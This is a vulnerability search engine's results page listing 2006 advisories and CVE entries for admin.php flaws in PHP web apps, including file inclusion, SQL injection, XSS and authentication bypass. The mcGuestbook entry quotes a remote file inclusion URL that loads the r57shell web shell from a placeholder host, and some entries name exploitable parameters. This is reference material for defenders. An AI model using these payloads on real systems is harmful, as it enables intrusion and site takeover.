CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1596 matches found

Packet Storm•added 2006/07/26 12:0 a.m.•31 views

mospray.txt

Kurdish Security MoSpray Remote File Include Vulnerability Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : MoSpray Site :...

7.4AI score

Exploits0

securityvulns•added 2006/07/25 12:0 a.m.•241 views

SQL-Injection in Shop-Script PRO & Shop-Script Premium all version

Advisory: SQL-Injection in Shop-Script PRO & Shop-Script Premium all version. Home Page: http://shop-script.ru Уязвимость/Vulnerability: SQL-injection в зоне администрирования. Уязвимый скрипт/Vulnerable script: admin.php...

7.1AI score

Exploits0

NVD•added 2006/06/30 11:5 p.m.•7 views

CVE-2006-3323

PHP remote file inclusion vulnerability in admin/admin.php in MF Piadas 1.0 allows remote attackers to execute arbitrary PHP code via the page parameter. NOTE: the same vector can be used for cross-site scripting, but CVE analysis suggests that this is resultant from file inclusion of HTML or...

7.5CVSS7.3AI score0.12463EPSS

Exploits1References11

Cvelist•added 2006/06/30 11:0 p.m.•14 views

CVE-2006-3323

7.3AI score0.12463EPSS

Exploits1References11

CVE•added 2006/06/30 11:0 p.m.•131 views

CVE-2006-3323

MF Piadas 1.0 is affected by a PHP remote file inclusion in admin/admin.php, exploitable via the page parameter to execute arbitrary code. The underlying issue is a file inclusion vulnerability (HTML/script vector noted as related by CVE analysis). Connected advisories also reference cross-site s...

7.5CVSS7.3AI score0.12463EPSS

Exploits1References11Affected Software1

securityvulns•added 2006/06/17 12:0 a.m.•23 views

file include exploits in mcGuestbook 1.3

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...

7.1AI score

Exploits0

securityvulns•added 2006/06/15 12:0 a.m.•36 views

file include exploits in mcGuestbook 1.3

Exploits0

Prion•added 2006/06/08 4:6 p.m.•11 views

Cross site scripting

Cross-site scripting XSS vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...

2.6CVSS6.1AI score0.00416EPSS

Exploits0References5Affected Software1

CVE•added 2006/06/08 4:0 p.m.•48 views

CVE-2006-2903

CVE-2006-2903 describes a cross-site scripting (XSS) vulnerability in Particle Links 1.2.2, specifically in admin.php where the username parameter can be exploited to inject arbitrary script/HTML. The available references (e.g., NVD entry) list a low severity (CVSS v2 base 2.6) with network attac...

2.6CVSS5.7AI score0.00416EPSS

Exploits0References5Affected Software1

Cvelist•added 2006/06/08 4:0 p.m.•13 views

CVE-2006-2903

Cross-site scripting XSS vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...

5.7AI score0.00416EPSS

Exploits0References5

securityvulns•added 2006/06/07 12:0 a.m.•40 views

BloggIT <= 1.01 (admin.php) Arbitrary code execution

/ Federico Fazzi, [email protected] / BloggIT = 1.01 admin.php Arbitrary code execution / 04/06/2006 5:48 Bug: The BloggIT have on the admin.php: require"session.inc.php"; //- sessionstart; //- if $SESSION'login' != "ok" header"Location: index.php"; and require function don't include the fil...

0.7AI score

Exploits0

CVE•added 2006/06/06 8:3 p.m.•46 views

CVE-2005-2466

OpenBook 1.2.2 is affected by multiple SQL injection vulnerabilities in the auth_user function of admin.php, allowing remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. The vulnerability is detailed in CVE-2005-2466 with a NVD base score of 6.4 (MED...

6.4CVSS9.1AI score0.00553EPSS

Exploits1References6Affected Software1

Positive Technologies•added 2006/06/06 12:0 a.m.•4 views

PT-2006-3777 · Mybloggie · Mybloggie

Name of the Vulnerable Software and Affected Versions: MyBloggie versions 2.1.1 and earlier Description: A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the mybloggie root path parameter to admin.php. The issue's validity has been disputed, with so...

7.5CVSS8AI score0.01708EPSS

Exploits1References6

NVD•added 2006/06/01 10:2 a.m.•12 views

CVE-2006-2726

PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...

7.5CVSS6.7AI score0.10558EPSS

Exploits1References11

Prion•added 2006/06/01 10:2 a.m.•14 views

Remote file inclusion

7.5CVSS7.1AI score0.10558EPSS

Exploits1References11Affected Software1

UbuntuCve•added 2006/05/30 10:2 a.m.•17 views

CVE-2006-2635

Multiple cross-site scripting XSS vulnerabilities in Tikiwiki aka Tiki CMS/Groupware 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "ipt" in 1 offset and 2 days parameters in a tiki-lastchanges.php, the 3 find and 4 offset parameters in ...

4.3CVSS6AI score0.11904EPSS

Exploits1References1

NVD•added 2006/05/24 8:2 p.m.•9 views

CVE-2006-2566

Alstrasoft Article Manager Pro 1.6 allows remote attackers to obtain sensitive information via 1 a quote character or possibly an invalid value in the action parameter in a request to mrarticles.php or 2 a login QUERYSTRING to admin.php without any additional parameters, which reveal the path in...

5CVSS6.5AI score0.0076EPSS

Exploits0References4

CVE•added 2006/05/22 10:0 p.m.•47 views

CVE-2006-2527

CVE-2006-2527 affects phpBazar 2.1.0 and earlier. The vulnerability in Admin/admin.php allows remote attackers to bypass authentication and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1. The description indicates...

7.5CVSS7.2AI score0.07527EPSS

Exploits0References6Affected Software1

exploitpack•added 2006/05/17 12:0 a.m.•9 views

BoastMachine 3.1 - admin.php Cross-Site Scripting

BoastMachine 3.1 - admin.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18012/info BoastMachine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute...

6.8AI score

Exploits0

Prion•added 2006/05/12 12:2 a.m.•11 views

Design/Logic Flaw

PlaNet Concept plaNetStat 20050127 allows remote attackers to gain administrative privileges, and view and configure log files, via a direct request to the 1 admin.php or 2 settings.php page...

7.5CVSS7.5AI score0.00717EPSS

Exploits0References3Affected Software1

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by